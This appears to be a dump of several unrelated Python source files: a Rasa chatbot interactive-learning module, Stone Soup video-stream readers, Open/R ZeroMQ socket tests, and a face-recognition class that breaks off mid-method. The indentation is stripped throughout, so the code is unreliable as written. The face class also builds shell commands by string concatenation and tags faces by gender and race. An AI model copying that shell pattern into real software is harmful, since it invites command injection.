data = evt.get("parse_data")
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__
]
logger.debug("Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors))
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"],
data["entities"])
msgs.append(msg)
return msgs
def _collect_actions(evts: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt
for evt in evts
if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text,
evts: List[Dict[Text, Any]]
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(evts)
with open(export_story_path, 'a', encoding="utf-8") as f:
for conversation in sub_conversations:
parsed_events = events.deserialise_events(conversation)
s = Story.from_events(parsed_events)
f.write(s.as_story_string(flat=True) + "\n")
async def _write_nlu_to_file(
export_nlu_path: Text,
evts: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa_nlu.training_data import TrainingData
msgs = _collect_messages(evts)
# noinspection PyBroadException
try:
previous_examples = load_data(export_nlu_path)
except Exception as e:
logger.exception("An exception occurred while trying to load the "
"NLU data.")
export_nlu_path = questionary.text(
message="Could not load existing NLU data, please "
"specify where to store NLU data learned in "
"this session (this will overwrite any "
"existing file). {}".format(str(e)),
default=PATHS["backup"]).ask()
if export_nlu_path is None:
return
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it to avoid a read
# in a write
if _guess_format(export_nlu_path) in {"md", "unk"}:
fformat = "md"
else:
fformat = "json"
with open(export_nlu_path, 'w', encoding="utf-8") as f:
if fformat == "md":
f.write(nlu_data.as_markdown())
else:
f.write(nlu_data.as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"]
for m in messages
for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
intents = {m.data["intent"]
for m in messages
if "intent" in m.data}
return [{i: {"use_entities": True}} for i in intents]
async def _write_domain_to_file(
domain_path: Text,
evts: List[Dict[Text, Any]],
endpoint: EndpointConfig
) -> None:
"""Write an updated domain file to the file path."""
domain = await retrieve_domain(endpoint)
old_domain = Domain.from_dict(domain)
messages = _collect_messages(evts)
actions = _collect_actions(evts)
# TODO for now there is no way to distinguish between action and form
intent_properties = Domain.collect_intent_properties(
_intents_from_messages(messages))
collected_actions = list({e["name"]
for e in actions
if e["name"] not in default_action_names()})
new_domain = Domain(
intent_properties=intent_properties,
entities=_entities_from_messages(messages),
slots=[],
templates={},
action_names=collected_actions,
form_names=[])
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(endpoint: EndpointConfig,
sender_id: Text,
finetune: bool,
sender_ids: List[Text],
plot_file: Optional[Text]
) -> None:
"""Predict and validate actions until we need to wait for a user msg."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint,
unconfirmed=[ActionExecuted(action_name)])
listen = await _validate_action(action_name, policy, confidence,
predictions, endpoint, sender_id,
finetune=finetune)
await _plot_trackers(sender_ids, plot_file, endpoint)
async def _correct_wrong_nlu(corrected_nlu: Dict[Text, Any],
evts: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
latest_message = latest_user_message(evts)
corrected_events = all_events_before_latest_user_msg(evts)
latest_message["parse_data"] = corrected_nlu
await replace_events(endpoint, sender_id, corrected_events)
await send_message(endpoint, sender_id, latest_message.get("text"),
latest_message.get("parse_data"))
async def _correct_wrong_action(corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
finetune: bool = False,
is_new_action: bool = False
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
result = await send_action(endpoint,
sender_id,
corrected_action,
is_new_action=is_new_action)
if finetune:
await send_finetune(endpoint,
result.get("tracker", {}).get("events", []))
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (tracker.get('active_form', {}).get('name') and
action_name != tracker['active_form']['name'] and
action_name != ACTION_LISTEN_NAME)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (tracker.get('active_form', {}).get('rejected') and
tracker.get('latest_action_name') == ACTION_LISTEN_NAME and
action_name == tracker.get('active_form', {}).get('name'))
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot))
validate_input = await _ask_questions(validation_questions, sender_id,
endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(endpoint, sender_id,
{"event": "form_validation", "validate": False})
elif not tracker.get('active_form', {}).get('validate'):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected.")
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(endpoint, sender_id,
{"event": "form_validation", "validate": True})
async def _validate_action(action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
finetune: bool = False
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(
"The bot wants to run '{}', correct?".format(action_name))
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(endpoint, sender_id,
{"event": "action_execution_rejected",
"name": tracker['active_form']['name']})
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint,
sender_id)
if not is_correct:
await _correct_wrong_action(action_name, endpoint, sender_id,
finetune=finetune,
is_new_action=is_new_action)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa_nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data.get("text")
if not parse_data.get("entities"):
parse_data["entities"] = []
# noinspection PyProtectedMember
return MarkdownWriter()._generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any],
intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(latest_message: Dict[Text, Any],
endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = ("Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?"
.format(text, intent))
else:
message = ("Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?"
.format(text, intent))
if intent is None:
print("The NLU classification for '{}' returned '{}'"
"".format(text, intent))
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(intents: List[Text],
endpoint: EndpointConfig,
sender_id: Text) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", []))
if latest_message.get("text").startswith(INTENT_MESSAGE_PREFIX):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(latest_message,
intents,
sender_id, endpoint)
evts = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text")
}
await _correct_wrong_nlu(corrected_nlu, evts, endpoint, sender_id)
async def _correct_entities(latest_message: Dict[Text, Any],
endpoint: EndpointConfig,
sender_id: Text) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa_nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation",
default=entity_str)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader()._parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original)
return corrected_entities
def _merge_annotated_and_original_entities(parse_annotated, parse_original):
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other):
return (entity['value'] == other['value'] and
entity['entity'] == other['entity'])
async def _enter_user_message(sender_id: Text,
endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint,
lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text,
endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text,
endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
cutoff_index = None
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") in {ActionExecuted.type_name, UserUttered.type_name}:
cutoff_index = i
break
elif e.get("event") == Restarted.type_name:
break
if cutoff_index is not None:
events_to_keep = tracker["events"][:-(cutoff_index + 1)]
# reset the events of the conversation to the events before
# the most recent bot or user event
await replace_events(endpoint, sender_id, events_to_keep)
async def _fetch_events(sender_ids: List[Union[Text, List[Event]]],
endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
evts = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(evts):
parsed_events = events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(event_sequences[-1],
event_sequences,
output_file=None,
max_history=2)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
DEFAULT_SERVER_PORT + 1)
visualization_help = ("Visualisation at {}/visualization.html."
"".format(visualization_url))
else:
visualization_help = ""
rasa.cli.utils.print_success("Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help))
async def record_messages(endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
finetune: bool = False,
stories: Optional[Text] = None,
skip_visualization: bool = False
):
"""Read messages from the command line and print bot responses."""
from rasa.core import training
try:
_print_help(skip_visualization)
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception("Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url))
return
trackers = await training.load_data(stories, Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
sender_ids = [t.events for t in trackers] + [sender_id]
if not skip_visualization:
plot_file = "story_graph.dot"
await _plot_trackers(sender_ids, plot_file, endpoint)
else:
plot_file = None
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(endpoint, sender_id,
finetune, sender_ids, plot_file)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id,
Restarted().as_dict())
await send_event(endpoint, sender_id,
ActionExecuted(ACTION_LISTEN_NAME).as_dict())
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
evts_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id,
Restarted().as_dict())
if evts_fork:
for evt in evts_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
def _serve_application(app, stories, finetune, skip_visualization):
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
finetune=finetune,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
app.run(host='0.0.0.0', port=DEFAULT_SERVER_PORT, access_log=True)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {'Cache-Control': "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
app.run(host='0.0.0.0', port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app,
loop):
_interpreter = NaturalLanguageInterpreter.create(args.get("nlu"),
endpoints.nlu)
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments)
app.agent = _agent
async def wait_til_server_is_running(endpoint,
max_retries=30,
sleep_between_retries=1):
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info("Reached core: {}".format(r))
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(stories: Text = None,
finetune: bool = False,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None
):
"""Start the interactive learning with the model of the agent."""
server_args = server_args or {}
if not skip_visualization:
p = Process(target=start_visualization, args=("story_graph.dot",))
p.deamon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("core"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("core"),
endpoints, server_args.get("nlu")),
'before_server_start')
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints,
additional_arguments),
'before_server_start')
_serve_application(app, stories, finetune, skip_visualization)
if not skip_visualization:
p.terminate()
p.join()
|
video.py
|
# -*- coding: utf-8 -*-
"""Video readers for Stone Soup.
This is a collection of video readers for Stone Soup, allowing quick reading
of video data/streams.
"""
import datetime
import threading
from abc import abstractmethod
from queue import Queue
from typing import Mapping, Tuple, Sequence, Any
from urllib.parse import ParseResult
import numpy as np
try:
import ffmpeg
import moviepy.editor as mpy
except ImportError as error:
raise ImportError(
"Usage of video processing classes requires that the optional"
"package dependencies 'moviepy' and 'ffmpeg-python' are installed. "
"This can be achieved by running "
"'python -m pip install stonesoup[video]'")\
from error
from .base import SensorDataReader
from .file import FileReader
from .url import UrlReader
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.sensordata import ImageFrame
class FrameReader(SensorDataReader):
"""FrameReader base class
A FrameReader produces :class:`~.SensorData` in the form of
:class:`~ImageFrame` objects.
"""
@property
def frame(self):
return self.sensor_data
@abstractmethod
@BufferedGenerator.generator_method
def frames_gen(self):
"""Returns a generator of frames for each time step.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
raise NotImplementedError
@BufferedGenerator.generator_method
def sensor_data_gen(self):
"""Returns a generator of frames for each time step.
Note
----
This is just a wrapper around (and therefore performs identically
to) :meth:`~frames_gen`.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
yield from self.frames_gen()
class VideoClipReader(FileReader, FrameReader):
"""VideoClipReader
A simple reader that uses MoviePy_ to read video frames from a file.
Usage of MoviePy allows for the application of clip transformations
and effects, as per the MoviePy documentation_. Upon instantiation,
the underlying MoviePy `VideoFileClip` instance can be accessed
through the :attr:`~clip` class property. This can then be used
as expected, e.g.:
.. code-block:: python
# Rearrange RGB to BGR
def arrange_bgr(image):
return image[:, :, [2, 1, 0]]
reader = VideoClipReader("path_to_file")
reader.clip = reader.clip.fl_image(arrange_bgr)
for timestamp, frame in reader:
# The generated frame.pixels will now
# be arranged in BGR format.
...
.. _MoviePy: https://zulko.github.io/moviepy/index.html
.. _documentation: https://zulko.github.io/moviepy/getting_started/effects.html
""" # noqa:E501
start_time = Property(datetime.timedelta,
doc="Start time expressed as duration "
"from the start of the clip",
default=datetime.timedelta(seconds=0))
end_time = Property(datetime.timedelta,
doc="End time expressed as duration "
"from the start of the clip",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
end_time_sec = self.end_time.total_seconds() if self.end_time is not None else None
self.clip = mpy.VideoFileClip(str(self.path)) \
.subclip(self.start_time.total_seconds(), end_time_sec)
@BufferedGenerator.generator_method
def frames_gen(self):
start_time = datetime.datetime.now()
for timestamp_sec, pixels in self.clip.iter_frames(with_times=True):
timestamp = start_time + datetime.timedelta(seconds=timestamp_sec)
frame = ImageFrame(pixels, timestamp)
yield timestamp, frame
class FFmpegVideoStreamReader(UrlReader, FrameReader):
""" FFmpegVideoStreamReader
A threaded reader that uses ffmpeg-python_ to read frames from video
streams (e.g. RTSP) in real-time.
Notes
-----
- Use of this class requires that FFmpeg_ is installed on the host machine.
- By default, FFmpeg performs internal buffering of frames leading to a \
slight delay in the incoming frames (0.5-1 sec). To remove the delay it \
is recommended to set ``input_opts={'threads': 1, 'fflags': 'nobuffer'}`` \
when instantiating a reader, e.g: .
.. code-block:: python
video_reader = FFmpegVideoStreamReader('rtsp://192.168.0.10:554/1/h264minor',
input_opts={'threads': 1, 'fflags': 'nobuffer'})
for timestamp, frame in video_reader:
....
.. _ffmpeg-python: https://github.com/kkroening/ffmpeg-python
.. _FFmpeg: https://www.ffmpeg.org/download.html
"""
url: ParseResult = Property(
doc="Input source to read video stream from, passed as input url argument. This can "
"include any valid FFmpeg input e.g. rtsp URL, device name when using 'dshow'/'v4l2'")
buffer_size: int = Property(
default=1,
doc="Size of the frame buffer. The frame buffer is used to cache frames in cases where "
"the stream generates frames faster than they are ingested by the reader. If "
"`buffer_size` is less than or equal to zero, the buffer size is infinite.")
input_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg input options, provided in the form of a dictionary, whose keys correspond to "
"option names. (e.g. ``{'fflags': 'nobuffer'}``). The default is ``{}``.")
output_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg output options, provided in the form of a dictionary, whose keys correspond "
"to option names. The default is ``{'f': 'rawvideo', 'pix_fmt': 'rgb24'}``.")
filters: Sequence[Tuple[str, Sequence[Any], Mapping[Any, Any]]] = Property(
default=None,
doc="FFmpeg filters, provided in the form of a list of filter name, sequence of "
"arguments, mapping of key/value pairs (e.g. ``[('scale', ('320', '240'), {})]``). "
"Default `None` where no filter will be applied. Note that :attr:`frame_size` may "
"need to be set in when video size changed by filter.")
frame_size: Tuple[int, int] = Property(
default=None,
doc="Tuple of frame width and height. Default `None` where it will be detected using "
"`ffprobe` against the input, but this may yield wrong width/height (e.g. when "
"filters are applied), and such this option can be used to override.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.input_opts is None:
self.input_opts = {}
if self.output_opts is None:
self.output_opts = {'f': 'rawvideo', 'pix_fmt': 'rgb24'}
if self.filters is None:
self.filters = []
self.buffer = Queue(maxsize=self.buffer_size)
if self.frame_size is not None:
self._stream_info = {
'width': self.frame_size[0],
'height': self.frame_size[1]}
else:
# Probe stream information
self._stream_info = next(
s
for s in ffmpeg.probe(self.url.geturl(), **self.input_opts)['streams']
if s['codec_type'] == 'video')
# Initialise stream
self.stream = ffmpeg.input(self.url.geturl(), **self.input_opts)
for filter_ in self.filters:
filter_name, filter_args, filter_kwargs = filter_
self.stream = self.stream.filter(
filter_name, *filter_args, **filter_kwargs
)
self.stream = (
self.stream
.output('pipe:', **self.output_opts)
.global_args('-y', '-loglevel', 'panic')
.run_async(pipe_stdout=True)
)
# Initialise capture thread
self._capture_thread = threading.Thread(target=self._run)
self._capture_thread.daemon = True
self._capture_thread.start()
@BufferedGenerator.generator_method
def frames_gen(self):
while self._capture_thread.is_alive():
# if not self.buffer.empty():
frame = self.buffer.get()
timestamp = frame.timestamp
yield timestamp, frame
def _run(self):
while self.stream.poll() is None:
width = int(self._stream_info['width'])
height = int(self._stream_info['height'])
# Read bytes from stream
in_bytes = self.stream.stdout.read(width * height * 3)
if in_bytes:
# Transform bytes to pixels
frame_np = (
np.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
frame = ImageFrame(frame_np, datetime.datetime.now())
# Write new frame to buffer
self.buffer.put(frame)
|
zmq_socket_tests.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import unittest
from multiprocessing import Process
import zmq
from openr.Lsdb import ttypes as lsdb_types
from openr.utils import zmq_socket
class TestSocket(unittest.TestCase):
def test_req_rep(self):
zmq_ctx = zmq.Context()
rep_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
rep_socket.bind("inproc://req_rep_test")
req_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REQ)
req_socket.connect("inproc://req_rep_test")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
req_socket.send_thrift_obj(thrift_obj)
recv_obj = rep_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
rep_socket.send_thrift_obj(recv_obj)
recv_obj = req_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_pub_sub(self):
zmq_ctx = zmq.Context()
pub_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.PUB)
pub_socket.bind("inproc://req_rep_test")
sub_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.SUB)
sub_socket.connect("inproc://req_rep_test")
sub_socket.set_sock_opt(zmq.SUBSCRIBE, b"")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
pub_socket.send_thrift_obj(thrift_obj)
recv_obj = sub_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_dealer_dealer(self):
zmq_ctx = zmq.Context()
d_socket_1 = zmq_socket.ZmqSocket(zmq_ctx, zmq.DEALER)
d_socket_1.bind("inproc://dealer_test")
d_socket_2 = zmq_socket.ZmqSocket(zmq_ctx, zmq.DEALER)
d_socket_2.connect("inproc://dealer_test")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
d_socket_1.send_thrift_obj(thrift_obj)
recv_obj = d_socket_2.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
d_socket_2.send_thrift_obj(recv_obj)
recv_obj = d_socket_1.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_status_conflicts(self):
zmq_ctx = zmq.Context()
bind_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
bind_socket.bind("inproc://status_test")
with self.assertRaises(Exception):
bind_socket.connect("inproc://status_test")
connect_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
connect_socket.connect("inproc://status_test")
with self.assertRaises(Exception):
connect_socket.bind("inproc://status_test")
def test_in_multi_processes(self):
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
def _send_recv():
req_socket = zmq_socket.ZmqSocket(zmq.Context(), zmq.REQ)
req_socket.connect("tcp://localhost:5000")
req_socket.send_thrift_obj(thrift_obj)
print("request sent")
recv_obj = req_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
print("reply received")
self.assertEqual(thrift_obj, recv_obj)
def _recv_send():
rep_socket = zmq_socket.ZmqSocket(zmq.Context(), zmq.REP)
rep_socket.bind("tcp://*:5000")
recv_obj = rep_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
print("request received")
self.assertEqual(thrift_obj, recv_obj)
rep_socket.send_thrift_obj(recv_obj)
print("reply sent")
q = Process(target=_recv_send)
q.start()
p = Process(target=_send_recv)
p.start()
p.join()
q.join()
|
recognition.py
|
import numpy as np
import multiprocessing
import face_recognition
import os
import pickle
from faceApi import settings
import cv2
class Recognizer:
'''
face recognition using face_recognition api
'''
def __init__(self, known_faces_encodes_npy_file_path, known_faces_ids_npy_file_path, face_tag_model_path=None):
'''
parameters:
known_faces_encodes_npy_file_path : path to the numpy file which contains saved faces encodes
known_faces_ids_npy_file_path : path to the numpy file which contains corresponding faces encodes ids.
face_tag_model_path : path of pickled MLP model to predict face gender and race from predicted face encodings
'''
self.known_faces_encodes_npy_file_path = known_faces_encodes_npy_file_path
self.known_faces_ids_npy_file_path = known_faces_ids_npy_file_path
self.load_known_faces_encodes_ids() # load the pre recognized faces if exist.
if face_tag_model_path !=None:
self.faceTagModel, self.faceTagsLabels = self.load_faceTag_model(face_tag_model_path)
def load_known_faces_encodes_ids(self):
'''
load pre saved faces encodes vectors and corrospondings ids from numpy files into
**known face encodes** list of numpy vectors that hold face encodes and **known_face_ids**(corresponding face encodes ids in list format)
compute **max_id** to use to append new encodes with new id.
'''
self.known_face_encodings =[]
self.known_face_ids = []
self.max_id = -1
try:
self.known_face_encodings = np.load(self.known_faces_encodes_npy_file_path).tolist()
self.known_face_ids = np.load(self.known_faces_ids_npy_file_path).tolist()
self.max_id = max(self.known_face_ids)
print("\n\n\n\ \t\t\t\t\t#### loaded ##### \n")
print("\n[INFO] known_face_ids loaded : ", self.known_face_ids)
print("\n[INFO] max id loaded : ", self.max_id)
print("\t\t\t###############################\n\n")
except Exception as e:
print("\n\n\n\t\t\t\t #### WARNING ##### \n\n no saved file for known faces")
os.system("touch "+self.known_faces_encodes_npy_file_path)
os.system("touch "+self.known_faces_ids_npy_file_path)
print(e)
def save_faces_encodings_with_ids(self):
'''
save faces encodes numpy list with corresponding ids
'''
known_faces_encodes_np = np.array(self.known_face_encodings)
known_faces_id_np = np.array(self.known_face_ids)
try:
np.save(self.known_faces_encodes_npy_file_path, known_faces_encodes_np)
np.save(self.known_faces_ids_npy_file_path, known_faces_id_np)
except Exception as e:
